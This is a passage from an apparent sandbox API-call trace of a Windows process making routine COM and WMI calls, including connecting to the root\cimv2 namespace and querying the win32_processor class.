WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x2 [0251.335] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1ea94*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1ea90 | out: ppvObject=0x1fe1ea90*=0x2261daa8) returned 0x0 [0251.336] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0251.337] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2261daa8, puCount=0x1fe1ec0c | out: puCount=0x1fe1ec0c*=0x2) returned 0x0 [0251.337] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x1 [0251.338] CoGetContextToken (in: pToken=0x1fe1ea48 | out: pToken=0x1fe1ea48) returned 0x0 [0251.339] CoGetContextToken (in: pToken=0x1fe1ea08 | out: pToken=0x1fe1ea08) returned 0x0 [0251.339] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x2 [0251.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1ea84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1ea80 | out: ppvObject=0x1fe1ea80*=0x2261daa8) returned 0x0 [0251.341] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0251.342] WbemDefPath:IWbemPath:GetText (in: This=0x2261daa8, lFlags=4, puBuffLength=0x1fe1ec08*=0x0, pszText=0x0 | out: puBuffLength=0x1fe1ec08*=0xf, pszText=0x0) returned 0x0 [0251.342] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x1 [0251.354] CoGetContextToken (in: pToken=0x1fe1ea48 | out: pToken=0x1fe1ea48) returned 0x0 [0251.355] CoGetContextToken (in: pToken=0x1fe1ea08 | out: pToken=0x1fe1ea08) returned 0x0 [0251.355] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x2 [0251.356] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1ea84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1ea80 | out: ppvObject=0x1fe1ea80*=0x2261daa8) returned 0x0 [0251.357] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0251.358] WbemDefPath:IWbemPath:GetText (in: This=0x2261daa8, lFlags=4, puBuffLength=0x1fe1ec08*=0xf, pszText="00000000000000" | out: puBuffLength=0x1fe1ec08*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0251.358] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x1 [0251.814] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1fe1eb08*=0x738, lpdwindex=0x1fe1e964 | out: lpdwindex=0x1fe1e964) returned 0x0 [0267.286] CoGetContextToken (in: pToken=0x1fe1eb8c | out: pToken=0x1fe1eb8c) returned 0x0 [0267.286] CoGetContextToken (in: pToken=0x1fe1eb38 | out: pToken=0x1fe1eb38) returned 0x0 [0267.286] IUnknown:QueryInterface (in: This=0x742030, riid=0x7355beb4*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1eb0c | out: ppvObject=0x1fe1eb0c*=0x742040) returned 0x0 [0267.288] CObjectContext::ContextCallback () returned 0x0 [0267.447] IUnknown:Release (This=0x742040) returned 0x1 [0267.449] CoUnmarshalInterface (in: pStm=0x1f842578, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1fe1eb90 | out: ppv=0x1fe1eb90*=0x1f83e75c) returned 0x0 [0267.450] CoMarshalInterface (pStm=0x1f842578, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x1f83e75c, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0267.451] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e75c, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e7b0 | out: ppvObject=0x1fe1e7b0*=0x1f83e75c) returned 0x0 [0267.461] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e75c, riid=0x734c4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1fe1e76c | out: ppvObject=0x1fe1e76c*=0x0) returned 0x80004002 [0267.463] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e75c, riid=0x733f0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1fe1e660 | out: ppvObject=0x1fe1e660*=0x0) returned 0x80004002 [0267.478] WbemLocator:IUnknown:AddRef (This=0x1f83e75c) returned 0x3 [0267.478] CoGetContextToken (in: pToken=0x1fe1e5f8 | out: pToken=0x1fe1e5f8) returned 0x0 [0267.478] CoGetContextToken (in: pToken=0x1fe1e5bc | out: pToken=0x1fe1e5bc) returned 0x0 [0267.479] IUnknown:QueryInterface (in: This=0x7421a0, riid=0x734c3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e5f0 | out: ppvObject=0x1fe1e5f0*=0x7421ac) returned 0x0 [0267.480] IComThreadingInfo:GetCurrentApartmentType (in: This=0x7421ac, pAptType=0x1fe1e620 | out: pAptType=0x1fe1e620*=3) returned 0x0 [0267.480] IUnknown:Release (This=0x7421ac) returned 0x1 [0267.480] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e75c, riid=0x733a23cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e5e0 | out: ppvObject=0x1fe1e5e0*=0x1f83e6bc) returned 0x0 [0267.481] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1f83e6bc, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1fe1e5e8 | out: pCid=0x1fe1e5e8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0267.481] WbemLocator:IUnknown:Release (This=0x1f83e6bc) returned 0x3 [0267.487] CoGetContextToken (in: pToken=0x1fe1e5f0 | out: pToken=0x1fe1e5f0) returned 0x0 [0267.487] WbemLocator:IUnknown:AddRef (This=0x1f83e75c) returned 0x4 [0267.487] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e75c, riid=0x733f767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e664 | out: ppvObject=0x1fe1e664*=0x1f83e744) returned 0x0 [0267.488] WbemLocator:IUnknown:Release (This=0x1f83e75c) returned 0x4 [0267.489] WbemLocator:IRpcOptions:Query (in: This=0x1f83e744, pPrx=0x1f83e75c, dwProperty=2, pdwValue=0x1fe1e688 | out: pdwValue=0x1fe1e688) returned 0x0 [0267.489] WbemLocator:IUnknown:Release (This=0x1f83e744) returned 0x3 [0267.499] WbemLocator:IUnknown:Release (This=0x1f83e75c) returned 0x2 [0267.519] WbemLocator:IUnknown:Release (This=0x1f83e75c) returned 0x1 [0267.520] CoGetContextToken (in: pToken=0x1fe1e64c | out: pToken=0x1fe1e64c) returned 0x0 [0267.520] WbemLocator:IUnknown:AddRef (This=0x1f83e75c) returned 0x2 [0267.522] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e75c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e8f0 | out: ppvObject=0x1fe1e8f0*=0x1f83e73c) returned 0x0 [0267.522] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1f83e73c, pProxy=0x1f83e75c, pAuthnSvc=0x1fe1e938, pAuthzSvc=0x1fe1e934, pServerPrincName=0x1fe1e944, pAuthnLevel=0x1fe1e93c, pImpLevel=0x1fe1e928, pAuthInfo=0x1fe1e92c, pCapabilites=0x1fe1e930 | out: pAuthnSvc=0x1fe1e938*=0xa, pAuthzSvc=0x1fe1e934*=0x0, pServerPrincName=0x1fe1e944, pAuthnLevel=0x1fe1e93c*=0x6, pImpLevel=0x1fe1e928*=0x2, pAuthInfo=0x1fe1e92c, pCapabilites=0x1fe1e930*=0x1) returned 0x0 [0267.522] WbemLocator:IUnknown:Release (This=0x1f83e73c) returned 0x2 [0267.523] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e75c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e8e4 | out: ppvObject=0x1fe1e8e4*=0x1f83e75c) returned 0x0 [0267.523] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e75c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e8e0 | out: ppvObject=0x1fe1e8e0*=0x1f83e73c) returned 0x0 [0267.523] WbemLocator:IClientSecurity:SetBlanket (This=0x1f83e73c, pProxy=0x1f83e75c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0267.524] WbemLocator:IUnknown:Release (This=0x1f83e73c) returned 0x3 [0267.524] WbemLocator:IUnknown:Release (This=0x1f83e75c) returned 0x2 [0267.524] CoTaskMemFree (pv=0x1f845cf8) [0267.525] WbemLocator:IUnknown:Release (This=0x1f83e75c) returned 0x1 [0267.653] SysStringLen (param_1=0x0) returned 0x0 [0267.709] GetLastError () returned 0x7e [0267.709] CoGetContextToken (in: pToken=0x1fe1ea6c | out: pToken=0x1fe1ea6c) returned 0x0 [0267.709] CoGetContextToken (in: pToken=0x1fe1ea2c | out: pToken=0x1fe1ea2c) returned 0x0 [0267.710] WbemLocator:IUnknown:AddRef (This=0x1f83e75c) returned 0x2 [0267.710] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e75c, riid=0x1fe1eaa8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1fe1eaa4 | out: ppvObject=0x1fe1eaa4*=0x2261dc84) returned 0x0 [0267.712] WbemLocator:IUnknown:Release (This=0x1f83e75c) returned 0x2 [0267.713] WbemLocator:IUnknown:Release (This=0x2261dc84) returned 0x1 [0267.713] CoGetContextToken (in: pToken=0x1fe1e600 | out: pToken=0x1fe1e600) returned 0x0 [0267.714] CoGetContextToken (in: pToken=0x1fe1e5c0 | out: pToken=0x1fe1e5c0) returned 0x0 [0267.714] WbemLocator:IUnknown:AddRef (This=0x1f83e75c) returned 0x2 [0267.714] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e75c, riid=0x1fe1e63c*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1fe1e638 | out: ppvObject=0x1fe1e638*=0x2261dc84) returned 0x0 [0267.715] WbemLocator:IUnknown:Release (This=0x1f83e75c) returned 0x2 [0267.715] WbemLocator:IUnknown:AddRef (This=0x2261dc84) returned 0x3 [0267.716] WbemLocator:IUnknown:QueryInterface (in: This=0x2261dc84, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e8f0 | out: ppvObject=0x1fe1e8f0*=0x1f83e73c) returned 0x0 [0267.717] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1f83e73c, pProxy=0x2261dc84, pAuthnSvc=0x1fe1e938, pAuthzSvc=0x1fe1e934, pServerPrincName=0x1fe1e944, pAuthnLevel=0x1fe1e93c, pImpLevel=0x1fe1e928, pAuthInfo=0x1fe1e92c, pCapabilites=0x1fe1e930 | out: pAuthnSvc=0x1fe1e938*=0xa, pAuthzSvc=0x1fe1e934*=0x0, pServerPrincName=0x1fe1e944, pAuthnLevel=0x1fe1e93c*=0x6, pImpLevel=0x1fe1e928*=0x2, pAuthInfo=0x1fe1e92c, pCapabilites=0x1fe1e930*=0x1) returned 0x0 [0267.717] WbemLocator:IUnknown:Release (This=0x1f83e73c) returned 0x3 [0267.717] WbemLocator:IUnknown:QueryInterface (in: This=0x2261dc84, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e8e4 | out: ppvObject=0x1fe1e8e4*=0x1f83e75c) returned 0x0 [0267.717] WbemLocator:IUnknown:QueryInterface (in: This=0x2261dc84, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e8e0 | out: ppvObject=0x1fe1e8e0*=0x1f83e73c) returned 0x0 [0267.718] WbemLocator:IClientSecurity:SetBlanket (This=0x1f83e73c, pProxy=0x2261dc84, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0267.718] WbemLocator:IUnknown:Release (This=0x1f83e73c) returned 0x4 [0267.719] WbemLocator:IUnknown:Release (This=0x1f83e75c) returned 0x3 [0267.719] CoTaskMemFree (pv=0x1f845cf8) [0267.719] WbemLocator:IUnknown:Release (This=0x2261dc84) returned 0x2 [0267.720] SysStringLen (param_1=0x0) returned 0x0 [0267.725] GetLastError () returned 0x0 [0267.871] CoGetContextToken (in: pToken=0x1fe1ea70 | out: pToken=0x1fe1ea70) returned 0x0 [0267.871] CoGetContextToken (in: pToken=0x1fe1ea30 | out: pToken=0x1fe1ea30) returned 0x0 [0267.871] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x3 [0267.872] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1eaac*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eaa8 | out: ppvObject=0x1fe1eaa8*=0x2261daa8) returned 0x0 [0267.873] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x3 [0267.873] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2261daa8, puCount=0x1fe1ec24 | out: puCount=0x1fe1ec24*=0x2) returned 0x0 [0267.873] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0267.874] CoGetContextToken (in: pToken=0x1fe1ea60 | out: pToken=0x1fe1ea60) returned 0x0 [0267.874] CoGetContextToken (in: pToken=0x1fe1ea20 | out: pToken=0x1fe1ea20) returned 0x0 [0267.874] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x3 [0267.875] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1ea9c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1ea98 | out: ppvObject=0x1fe1ea98*=0x2261daa8) returned 0x0 [0267.876] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x3 [0267.877] WbemDefPath:IWbemPath:GetText (in: This=0x2261daa8, lFlags=4, puBuffLength=0x1fe1ec20*=0x0, pszText=0x0 | out: puBuffLength=0x1fe1ec20*=0xf, pszText=0x0) returned 0x0 [0267.877] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0267.877] CoGetContextToken (in: pToken=0x1fe1ea60 | out: pToken=0x1fe1ea60) returned 0x0 [0267.878] CoGetContextToken (in: pToken=0x1fe1ea20 | out: pToken=0x1fe1ea20) returned 0x0 [0267.878] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x3 [0267.878] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1ea9c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1ea98 | out: ppvObject=0x1fe1ea98*=0x2261daa8) returned 0x0 [0267.879] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x3 [0267.880] WbemDefPath:IWbemPath:GetText (in: This=0x2261daa8, lFlags=4, puBuffLength=0x1fe1ec20*=0xf, pszText="00000000000000" | out: puBuffLength=0x1fe1ec20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0267.880] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0267.881] CoGetContextToken (in: pToken=0x1fe1eafc | out: pToken=0x1fe1eafc) returned 0x0 [0267.882] CoUnmarshalInterface (in: pStm=0x1f842578, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1fe1eb00 | out: ppv=0x1fe1eb00*=0x1f83e75c) returned 0x0 [0267.883] CoMarshalInterface (pStm=0x1f842578, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x1f83e75c, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0267.884] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e75c, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e720 | out: ppvObject=0x1fe1e720*=0x1f83e75c) returned 0x0 [0267.896] WbemLocator:IUnknown:Release (This=0x1f83e75c) returned 0x3 [0267.896] WbemLocator:IUnknown:Release (This=0x1f83e75c) returned 0x2 [0267.897] CoGetContextToken (in: pToken=0x1fe1e5bc | out: pToken=0x1fe1e5bc) returned 0x0 [0267.898] WbemLocator:IUnknown:AddRef (This=0x1f83e75c) returned 0x3 [0267.899] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e75c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e860 | out: ppvObject=0x1fe1e860*=0x1f83e73c) returned 0x0 [0267.900] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1f83e73c, pProxy=0x1f83e75c, pAuthnSvc=0x1fe1e8a8, pAuthzSvc=0x1fe1e8a4, pServerPrincName=0x1fe1e8b4, pAuthnLevel=0x1fe1e8ac, pImpLevel=0x1fe1e898, pAuthInfo=0x1fe1e89c, pCapabilites=0x1fe1e8a0 | out: pAuthnSvc=0x1fe1e8a8*=0xa, pAuthzSvc=0x1fe1e8a4*=0x0, pServerPrincName=0x1fe1e8b4, pAuthnLevel=0x1fe1e8ac*=0x6, pImpLevel=0x1fe1e898*=0x3, pAuthInfo=0x1fe1e89c, pCapabilites=0x1fe1e8a0*=0x20) returned 0x0 [0267.901] WbemLocator:IUnknown:Release (This=0x1f83e73c) returned 0x3 [0267.901] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e75c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e854 | out: ppvObject=0x1fe1e854*=0x1f83e75c) returned 0x0 [0267.902] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e75c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e850 | out: ppvObject=0x1fe1e850*=0x1f83e73c) returned 0x0 [0267.903] WbemLocator:IClientSecurity:SetBlanket (This=0x1f83e73c, pProxy=0x1f83e75c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0267.904] WbemLocator:IUnknown:Release (This=0x1f83e73c) returned 0x4 [0267.905] WbemLocator:IUnknown:Release (This=0x1f83e75c) returned 0x3 [0267.907] WbemLocator:IUnknown:Release (This=0x1f83e75c) returned 0x2 [0267.908] SysStringLen (param_1=0x0) returned 0x0 [0267.914] GetLastError () returned 0x0 [0267.914] CoGetContextToken (in: pToken=0x1fe1e9dc | out: pToken=0x1fe1e9dc) returned 0x0 [0267.915] WbemLocator:IUnknown:AddRef (This=0x2261dc84) returned 0x3 [0267.915] WbemLocator:IUnknown:Release (This=0x2261dc84) returned 0x2 [0267.916] CoGetContextToken (in: pToken=0x1fe1e570 | out: pToken=0x1fe1e570) returned 0x0 [0267.916] WbemLocator:IUnknown:AddRef (This=0x2261dc84) returned 0x3 [0267.918] WbemLocator:IUnknown:QueryInterface (in: This=0x2261dc84, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e860 | out: ppvObject=0x1fe1e860*=0x1f83e73c) returned 0x0 [0267.919] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1f83e73c, pProxy=0x2261dc84, pAuthnSvc=0x1fe1e8a8, pAuthzSvc=0x1fe1e8a4, pServerPrincName=0x1fe1e8b4, pAuthnLevel=0x1fe1e8ac, pImpLevel=0x1fe1e898, pAuthInfo=0x1fe1e89c, pCapabilites=0x1fe1e8a0 | out: pAuthnSvc=0x1fe1e8a8*=0xa, pAuthzSvc=0x1fe1e8a4*=0x0, pServerPrincName=0x1fe1e8b4, pAuthnLevel=0x1fe1e8ac*=0x6, pImpLevel=0x1fe1e898*=0x3, pAuthInfo=0x1fe1e89c, pCapabilites=0x1fe1e8a0*=0x20) returned 0x0 [0267.919] WbemLocator:IUnknown:Release (This=0x1f83e73c) returned 0x3 [0267.919] WbemLocator:IUnknown:QueryInterface (in: This=0x2261dc84, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e854 | out: ppvObject=0x1fe1e854*=0x1f83e75c) returned 0x0 [0267.920] WbemLocator:IUnknown:QueryInterface (in: This=0x2261dc84, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e850 | out: ppvObject=0x1fe1e850*=0x1f83e73c) returned 0x0 [0267.920] WbemLocator:IClientSecurity:SetBlanket (This=0x1f83e73c, pProxy=0x2261dc84, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0267.921] WbemLocator:IUnknown:Release (This=0x1f83e73c) returned 0x4 [0267.921] WbemLocator:IUnknown:Release (This=0x1f83e75c) returned 0x3 [0267.922] WbemLocator:IUnknown:Release (This=0x2261dc84) returned 0x2 [0267.923] SysStringLen (param_1=0x0) returned 0x0 [0267.928] GetLastError () returned 0x0 [0267.930] CoGetContextToken (in: pToken=0x1fe1ea68 | out: pToken=0x1fe1ea68) returned 0x0 [0267.930] CoGetContextToken (in: pToken=0x1fe1ea28 | out: pToken=0x1fe1ea28) returned 0x0 [0267.930] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0267.931] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eaa4*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eaa0 | out: ppvObject=0x1fe1eaa0*=0x2261fd10) returned 0x0 [0267.932] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0267.933] WbemDefPath:IWbemPath:GetText (in: This=0x2261fd10, lFlags=2, puBuffLength=0x1fe1ec28*=0x0, pszText=0x0 | out: puBuffLength=0x1fe1ec28*=0x10, pszText=0x0) returned 0x0 [0267.933] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0267.935] CoGetContextToken (in: pToken=0x1fe1ea68 | out: pToken=0x1fe1ea68) returned 0x0 [0267.935] CoGetContextToken (in: pToken=0x1fe1ea28 | out: pToken=0x1fe1ea28) returned 0x0 [0267.936] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0267.936] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eaa4*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eaa0 | out: ppvObject=0x1fe1eaa0*=0x2261fd10) returned 0x0 [0267.938] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0267.939] WbemDefPath:IWbemPath:GetText (in: This=0x2261fd10, lFlags=2, puBuffLength=0x1fe1ec28*=0x10, pszText="000000000000000" | out: puBuffLength=0x1fe1ec28*=0x10, pszText="win32_processor") returned 0x0 [0267.939] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0268.270] CoGetContextToken (in: pToken=0x1fe1e85c | out: pToken=0x1fe1e85c) returned 0x0 [0268.270] WbemLocator:IUnknown:AddRef (This=0x2261dc84) returned 0x3 [0268.271] IWbemServices:GetObject (in: This=0x2261dc84, strObjectPath="win32_processor", lFlags=0, pCtx=0x0, ppObject=0x1fe1e9d0*=0x0, ppCallResult=0x0 | out: ppObject=0x1fe1e9d0*=0x22625708, ppCallResult=0x0) returned 0x0 [0268.303] WbemLocator:IUnknown:Release (This=0x2261dc84) returned 0x2 [0268.521] IWbemClassObject:Get (in: This=0x22625708, wszName="__PATH", lFlags=0, pVal=0x1fe1eb8c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1fe1ec70*=0, plFlavor=0x1fe1ec6c*=0 | out: pVal=0x1fe1eb8c*(varType=0x8, wReserved1=0x0, 